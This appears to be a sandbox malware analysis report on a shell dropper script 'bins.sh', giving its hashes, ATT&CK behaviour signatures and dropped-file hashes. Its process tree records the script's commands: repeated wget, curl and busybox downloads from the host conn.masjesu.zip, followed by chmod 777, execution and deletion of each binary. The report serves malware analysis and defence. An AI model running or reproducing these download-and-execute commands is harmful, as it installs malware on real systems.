Overview

overview

7

Static

static

1

bins.sh

ubuntu-18.04-amd64

3

bins.sh

debian-9-armhf

4

bins.sh

debian-9-mips

7

bins.sh

debian-9-mipsel

7

Analysis

  • max time kernel
    150s
  • max time network
    23s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240418-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    01-11-2024 03:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    480229a700195be388039fc504594b0c

  • SHA1

    627e9a54a2c3a15744b942126bbafb41eb836714

  • SHA256

    0f7f04fb9dade4dd143c40d029fdd9d23dd535f1e913cc19b3e64ccde9dc7299

  • SHA512

    07888fd6c46abd688a1589d7e67a9640e574632fae10e6c8cb73750602c6667352e9c937c98bdf5e6874af5c9eec4c1121c06a963b842e0086e61ef4370e66d6

  • SSDEEP

    192:HFd8hXTEnFpUXP0EkI6E/FpUXPtGFd8hXTcA:EanFpUXP0Ed6E/FpUXPxmA

Score
7/10
defense_evasiondiscovery

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 5 IoCs
  • Reads runtime system information 6 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 17 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 13 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:718
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:721
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:727
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:747
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:751
        • /bin/chmod
          chmod 777 NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ
          2⤵
          • File and Directory Permissions Modification
          PID:752
        • /tmp/NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ
          ./NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ
          2⤵
          • Executes dropped EXE
          PID:753
        • /bin/rm
          rm NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ
          2⤵
            PID:755
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j
            2⤵
            • System Network Configuration Discovery
            PID:756
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j
            2⤵
            • Reads runtime system information
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:757
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:759
          • /bin/chmod
            chmod 777 sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j
            2⤵
            • File and Directory Permissions Modification
            PID:760
          • /tmp/sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j
            ./sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j
            2⤵
            • Executes dropped EXE
            PID:761
          • /bin/rm
            rm sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j
            2⤵
              PID:763
            • /usr/bin/wget
              wget http://conn.masjesu.zip/bins/Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di
              2⤵
              • System Network Configuration Discovery
              PID:764
            • /usr/bin/curl
              curl -O http://conn.masjesu.zip/bins/Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di
              2⤵
              • Reads runtime system information
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:765
            • /bin/busybox
              /bin/busybox wget http://conn.masjesu.zip/bins/Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di
              2⤵
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:773
            • /bin/chmod
              chmod 777 Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di
              2⤵
              • File and Directory Permissions Modification
              PID:779
            • /tmp/Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di
              ./Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di
              2⤵
              • Executes dropped EXE
              PID:780
            • /bin/rm
              rm Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di
              2⤵
                PID:783
              • /usr/bin/wget
                wget http://conn.masjesu.zip/bins/UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:784
              • /usr/bin/curl
                curl -O http://conn.masjesu.zip/bins/UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR
                2⤵
                • Reads runtime system information
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:799
              • /bin/busybox
                /bin/busybox wget http://conn.masjesu.zip/bins/UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR
                2⤵
                • System Network Configuration Discovery
                PID:815
              • /bin/chmod
                chmod 777 UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR
                2⤵
                • File and Directory Permissions Modification
                PID:819
              • /tmp/UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR
                ./UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR
                2⤵
                • Executes dropped EXE
                PID:820
              • /bin/rm
                rm UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR
                2⤵
                  PID:823
                • /usr/bin/wget
                  wget http://conn.masjesu.zip/bins/yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar
                  2⤵
                  • System Network Configuration Discovery
                  • Writes file to tmp directory
                  PID:824
                • /usr/bin/curl
                  curl -O http://conn.masjesu.zip/bins/yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar
                  2⤵
                  • Reads runtime system information
                  • System Network Configuration Discovery
                  • Writes file to tmp directory
                  PID:826
                • /bin/busybox
                  /bin/busybox wget http://conn.masjesu.zip/bins/yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar
                  2⤵
                  • System Network Configuration Discovery
                  • Writes file to tmp directory
                  PID:828
                • /bin/chmod
                  chmod 777 yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar
                  2⤵
                  • File and Directory Permissions Modification
                  PID:829
                • /tmp/yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar
                  ./yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar
                  2⤵
                  • Executes dropped EXE
                  PID:830
                • /bin/rm
                  rm yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar
                  2⤵
                    PID:832
                  • /usr/bin/wget
                    wget http://conn.masjesu.zip/bins/E0hLfwgFRpneb3m9lzPzGjSoCstaDqrfAW
                    2⤵
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:833
                  • /usr/bin/curl
                    curl -O http://conn.masjesu.zip/bins/E0hLfwgFRpneb3m9lzPzGjSoCstaDqrfAW
                    2⤵
                    • Reads runtime system information
                    • System Network Configuration Discovery
                    PID:835

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di
                  Filesize

                  93KB

                  MD5

                  8fad5e89ce3d2b6159ac2ce2fdf7c084

                  SHA1

                  27105a304b9bb7cd8a663d1b4da1d92fd8eea355

                  SHA256

                  24689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6

                  SHA512

                  71689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc

                  Download Submit

                • /tmp/E0hLfwgFRpneb3m9lzPzGjSoCstaDqrfAW
                  Filesize

                  158KB

                  MD5

                  d8e96e2fdd3c610ec19128e18de5abde

                  SHA1

                  10cf691ae9779bfeca8b67e75721d0a6f275e4f9

                  SHA256

                  f09f8db2883da603f963189ef3b8185b179832de8b2e526ef63fe8b96847cc7b

                  SHA512

                  979e0f29d7b65fcf7c4d93ec6fdaa70cdd26d9fa8a526fee7d4cdb028229db06186f89c9b0c93d3112e636c1b65819d46695310c90a1700343c2221df9323592

                  Download Submit

                • /tmp/NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ
                  Filesize

                  80KB

                  MD5

                  22c527269cbd9b42f4ade79f52757efb

                  SHA1

                  c2456188a49af93b0d07af2a7cc1346d5be510bd

                  SHA256

                  100042d7138b4348a13c54c191d501d125b7fea7631382e7d0e9d7251057ce97

                  SHA512

                  7b7cb4d8307c0437163cdbfa349f1285cfa26c25ec856f8b4d4cebf8f71cae87e74de8f3c0f29ef2789168a4499bfe95007d7d524ed734e3eb4ac0d0e4e09b53

                  Download Submit

                • /tmp/UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR
                  Filesize

                  101KB

                  MD5

                  8d0f8d45165dc1f3ba334ce75be39621

                  SHA1

                  1d5baece9d5af3885276735c3c20d28e161e00ff

                  SHA256

                  17441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791

                  SHA512

                  a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7

                  Download Submit

                • /tmp/sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j
                  Filesize

                  129KB

                  MD5

                  54bec959d900ad930dc662f8092da57d

                  SHA1

                  9ae7ad9018eeac5aa89bcde68ec683a364ac7d55

                  SHA256

                  b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12

                  SHA512

                  904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40

                  Download Submit

                • /tmp/yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar
                  Filesize

                  95KB

                  MD5

                  c20c610e14b8e59f5f8258a55fe7f27d

                  SHA1

                  e59a0b83d9882f2770f052a213cad25b0cbd53fc

                  SHA256

                  adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b

                  SHA512

                  dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2

                  Download Submit

                • /tmp/yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar
                  Filesize

                  16B

                  MD5

                  7689ca8c5bc85cf6b78ef89323d4df6a

                  SHA1

                  a1392ec3b571b3de167f0b9a5dadab4f14a2db76

                  SHA256

                  17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5

                  SHA512

                  40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471

                  Download Submit